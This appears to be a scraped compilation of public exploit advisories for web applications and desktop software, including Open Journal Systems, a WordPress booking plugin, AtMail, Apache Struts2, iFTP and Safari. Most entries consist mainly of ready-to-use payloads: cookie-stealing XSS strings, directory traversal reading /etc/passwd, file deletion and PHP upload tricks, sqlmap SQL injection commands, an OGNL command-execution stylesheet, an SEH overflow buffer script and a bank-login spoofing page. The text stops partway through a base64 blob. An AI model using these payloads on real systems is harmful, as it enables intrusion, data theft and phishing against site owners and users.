HireHackking

source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. On the following URL: http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id] the attacker should inject malicious scripting code to the "Bio Statement" or "Abstract of Submission" fields: <img src="x"/onerror=alert(document.cookie)> or (browser specific): <img style="width:expression(alert(document.cookie));"></a> The stored XSS will be displayed here: http://www.example.com/index.php/[submission]/author/submission/[id]

source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=delete|/../../../../../../../../../../../../../../../../../../../temp/file_to_delete Arbitrary File Renaming: http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|file.jpg|file.php%00.jpg http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=en& param=rename|/../../../../../../../../../../../../../../../../../../../tmp/file_to_move|1x.jpg

# Exploit Title: PHPCollab 2.5 - SQL Injection # Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID=" # Date: 13/05/2015 # Exploit Author: Wad Deek # Vendor Homepage: http://www.phpcollab.com/ # Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/ # Version: 2.5 +>2.5<+ --> /docs/changes.txt +>2.5<+ --> /docs/readme.txt # Tested on: Xampp on Windows7 ################################################################################### PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27 ################################################################################### #===================================================== require('mechanize') agent = Mechanize.new() agent.redirect_ok = false agent.verify_mode = OpenSSL::SSL::VERIFY_NONE #===================================================== begin html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27") rescue else puts(html.body()) end #=====================================================

source: https://www.securityfocus.com/bid/52666/info Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: 1. An arbitrary-file-deletion vulnerability 2. A security vulnerability 3. An arbitrary-file-upload vulnerability 4. Multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. Malicious registered user shall start a new Submission: http://www.example.com/index.php/[journal]/author/submit/1 on the second step of the Submission: http://www.example.com/index.php/[journal]/author/submit/2?articleId=14 the user should upload test.pHp, test.asp, test.cgi, test.php3 or test.html file. The uploaded file will be available on the following URL: http://www.example.com/files/journals/[journalid]/articles/[articleid]/submission/original/[newfilename] The original file name will be changed, however it will be displayed to the user after upload (for example "16-28-1-SM.pHp"). File extension will remain the same.

# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities] # Date: 2015-05-01 # Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form # Vendor: CodePeople.net # Vebdor URI: http://codepeople.net # Version: 1.0.2 # OWASP Top10: A1-Injection # Tested on: windows 7 ultimate + firefox + sqlmap 0.9. ============================================ * Authenticated SQL injection ============================================ ======================== Description ======================== In a site that has installed the plugin vulnerable and an attacker who has an account editor privileges can exploit the flaw SQL injection and possibly escalate their privileges. ======================== Vulnerability ======================== vulnerable function code is located in dex_bcf.php function dex_bccf_load_season_prices() { global $wpdb; if ( ! current_user_can('edit_pages') ) { echo 'No enough privilegies to load this content.'; exit; } if (!defined('CP_BCCF_CALENDAR_ID')) define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]); //.....vulnerable line $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.CP_BCCF_CALENDAR_ID); $maxcosts = 0; ... if (count ($codes)) { ... //Print results [bueno para seleccion mediante UNION] foreach ($codes as $value) { echo '<tr>'; $price = explode(';',$value->price); echo '<td>'.$price[0].'</td>'; for ($k=1; $k<=$maxcosts; $k++) echo '<td>'.@$price[$k].'</td>'; echo '<td>'.substr($value->date_from,0,10).'</td>'; echo '<td>'.substr($value->date_to,0,10).'</td>'; echo '<td>[<a href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>'; echo '</tr>'; } ... } ====================== Injection ====================== the following urls can be used to inject code. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 ------------------------ GET parameter vulnerable ------------------------ dex_item ======================== injection techniques: ======================== -> UNION BASED -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1 " -p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs ==================================================== ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_delete($ret) { global $wpdb; $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> TIME BASED BLIND ======================= POC ======================= Obtaining all available databases from mysql server with sqlmap. --------------------------------------------------------------- python sqlmap.py --url=" http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete " --data="id=1" -p id --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T ==================================================== * Authenticated SQL injection ==================================================== =============== Vulnerable code ================ function dex_bccf_calendar_update($ret) { global $wpdb; dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin", "varchar(10) DEFAULT '0' NOT NULL"); dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color", "varchar(10)"); $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."' where id=".esc_sql($_POST["id"]) ); return $ret; } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ------------------------ POST parameter vulnerable ------------------------ id ======================== injection techniques: ======================== -> BLIND ======================= POC ======================= (modifing all rows with "i0akiN" value and sleeping 5 seconds) url ------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit ---------- post data ---------- id=0 or 1=1 AND SLEEP(5) -- - &tile=i0akiN&description=i0akiN&color=i0akiN ===================================================== * Filter bypass & Authenticated SQL injection ===================================================== =============== Vulnerable code ================ function dex_bccf_calendar_add($ret) { global $wpdb; $calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]); ... $wpdb->query("insert into ".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color) ". " values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','" .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')"); .. } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi] ======================== injection techniques: ======================== -> Insertion data ======================= POC ======================= Insert a row into wp_bccf_reservation_calendars_data table without use other post parameters http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add& id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- - ==================================================== * Unauthenticated SQL injection ==================================================== ======================= Description ======================= An attacker without autorization can send modified requests to database and sensitive information that can use for escalate privilegies and more... ====================== Vulnerability ====================== vulnerable function code is located in dex_bcf.php function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... } ====================== Injection ====================== Following URLs are affected. ---------------------------------------------------------- http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost ------------------------ post variable vulnerable ------------------------ dex_item=1 ======================== injection techniques: ======================== -> UNION BASED <- yeaahh!! -> TIME BASED BLIND -> BOOLEAN BASED BLIND ======================== POC ======================== Obtaining all available databases from mysql server with sqlmap. python sqlmap.py --url=" http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost " --data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs --tecnique U =========================================================== ============================================================ * Unauthenticated SQL injection 2 ============================================================ ======================== Description ======================== The following function is also vulnerable to SQL injection because usually the variable CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET ['dex_item'] Besides this function is used in several places the code. ======================== Vulnerability ======================== Vulnerable function: function dex_bccf_get_option ($field, $default_value) { global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id; if (!defined("CP_BCCF_CALENDAR_ID")) return $default_value; if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID) $value = @$dex_option_buffered_item->$field; else { //....vulnerable line $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID ); $value = @$myrows[0]->$field; $dex_option_buffered_item = $myrows[0]; $dex_option_buffered_id = CP_BCCF_CALENDAR_ID; } if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value; return $value; } ########################################## ====================================== * CAPTCHA BYPASS & ROW INSERTION ====================================== ============== DESCRIPTION ============== An attacker can manipulate some variables for bypass conditional staments. For example: insert unlimited rows into table (could use a program) ============= ... HOW? ============= An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5 encryption saving into value of "rand_code" cookie. ========== POC ========== REQUEST ----------- http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1& dex_item=1& http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data& hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin ^ -------------- | POST VARIABLES -------------- hdcaptcha_dex_bccf_post=1 ------- COOKIES ------- rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted =========================== VULNERABLE FUNCTION CODE ========================== function dex_bccf_check_posted_data(){ .... if (!isset($_GET['hdcaptcha_dex_bccf_post']) ||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post'] = @$_POST['hdcaptcha_dex_bccf_post']; if ( (dex_bccf_get_option('dexcv_enable_captcha', TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') && ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) != strtolower($_SESSION['rand_code'])) || ($_SESSION['rand_code'] == '') ) && ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) != ($_COOKIE['rand_code'])) || ($_COOKIE['rand_code'] == '') ) ) { $_SESSION['rand_code'] = ''; echo 'captchafailed'; exit; } // if this isn't the real post (it was the captcha verification) then echo ok and exit if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['dex_bccf_post'] ) ) { echo 'ok'; exit; } ... } ########################################### ======================================= * Persistent JS/HTML code injection ======================================= ======================== Description: ======================== Un atacante sin autenticacion puede inyectar codigo malicioso que podria ejecutar el navegador de la victima(could be an administrator). Cuando la victima visite la pagina modificada, el atacante podria robar datos y/o controlar las acciones de la victima de forma remota. ======================== Vulnerability ======================== http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data POST-DATA dex_item=2 dex_bccf_post_options=1 email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION %3Ctextarea%3E Parameters email_confirmation_to_user,email_notification_to_admin not filtered and is included in admin page ==================== VULNERABLE FUNCTION ==================== dex_bccf_save_options() located in dex_bccf.php save unfiltered post data #########################################

source: https://www.securityfocus.com/bid/52672/info Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected. http://www.exmaple.com/min/builder/#g=[XSS]

source: https://www.securityfocus.com/bid/52701/info Event Calendar PHP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS]

source: https://www.securityfocus.com/bid/52684/info AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input. An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process. Atmail 1.04 is vulnerable; other versions may also be affected. https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html

source: https://www.securityfocus.com/bid/52720/info FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. FbiLike 1.00 is vulnerable; other versions may also be affected. http://www.example.com/fbilike/like.php?id=[XSS]

source: https://www.securityfocus.com/bid/52702/info Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. <?xml version="1.0" encoding="UTF-8" ?> <xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform" version="1.0" xmlns:ognl="ognl.Ognl"> <xsl:template match="/"> <html> <body> <h2>hacked by kxlzx</h2> <h2>http://www.example.com</h2> <exp> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/> </exp> </body> </html> </xsl:template> </xsl:stylesheet>

source: https://www.securityfocus.com/bid/52728/info NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. NextBBS 0.6.0 is vulnerable; other versions may also be affected. http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe

source: https://www.securityfocus.com/bid/52725/info Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Geeklog 1.8.1 is vulnerable; other versions may also be affected. http://www.example.com/easyfile/index.php?folder=(SQLI)

#!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.com/iftp.php #Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe #Version: 2.21 #Tested on : Windows XP Sp3 ########################################################################################### #Crash : Go to Connect > Host Address > Post it #Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( ) ############################################################################################ buffer = "A"*1865 buffer +="BBBB" #Pointer to next SEH record buffer +="CCCC" #SE handler buffer +="D"*500 file = "buffer.txt" f = open(file, "w") f.write(buffer) f.close()

source: https://www.securityfocus.com/bid/52728/info NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. NextBBS 0.6.0 is vulnerable; other versions may also be affected. http://www.example.com/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);>

source: https://www.securityfocus.com/bid/52730/info Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT> http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0

source: https://www.securityfocus.com/bid/52739/info WordPress Integrator is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Integrator 1.32 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>

source: https://www.securityfocus.com/bid/52740/info Invision Power Board is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Invision Power Board 4.2.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax&section=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E

source: https://www.securityfocus.com/bid/52746/info Apple Safari for Windows is affected by a URI-spoofing vulnerability. An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site. Versions prior to Apple Safari 5.1.5 on Windows systems are vulnerable. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.example.com/TR/html4/loose.dtd"> <html> <head> <title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title> <script type="text/javascript"> var wx; function invokePoC() { wx = open("http://www:example.com/login","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,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61TaVMnYG5ZfWUhT4xq3fbzG9b1mqLRP5nqft1ZUgDNCoJadDWYJU1DCHpax9iWI28WL5sSwlDKIDWSKAiK3AwdkoAqxm9u7khm3imftj3XbZfMuCMkUVG+KuLk19nBHu2QtpSLSL545POI/f6hwA7nzwZgsYiGlvajkLvHBQk04wzXOcUc13IaHUjh+CU6QfRQHziQFBslpFUA/lzT6Ii9/skvYmdSVJyS27cimzXeel5rrl+dAD/pgCpzEdwr96Ei3i8hbnvSmO50tMn+61KdO9apb/epYz7rWmLfO9a57/etgD7vYx072spv97GhPu9rXzva2u/3tcI+73OdO97rb/e54z7veUbK+vvv974APvOAHT/jCG/7wiE+84hfP+MY7/vGQj7zkJ0/5ylv+8pjPvOY3z/nOe57wew+96EdP+tKb/vSoT73qx/O41rv+9bCPvexnT/va2/72uM+97nfP+977/vfAD77wh0/84hv/+Mi/1b1Bks/85jv/+dCPvvSnT/3qW//62M9+85ev/e57//vgD7/4x0/+8pv//LXnPvrXz/72u//98I+//Of/e/XT//74z7/+98///vsf9vb3fwI4gARYgAZ4gAjIewGYgAzYgA74gBAYgeS3gBJYgRZ4gRiYgRroehS4gR74gSAYgiJIfx04giZ4giiYgiqYfCW4gi74gjAYgzLYGi04gzZ4gziYgw5YgzrYgz74g0DofjwYhERYhEZ4hNA3hEi4hEzYhE5Ie0r4hFI4hVTIhFFYhViYhVo4g0NXuIVe+IVg6IGrN4ZkWIZmeIZomIZquIZs2IZu+IZwGIdyOId0WId2eId4mId6uId82Id++IeAGIiCOIiEWI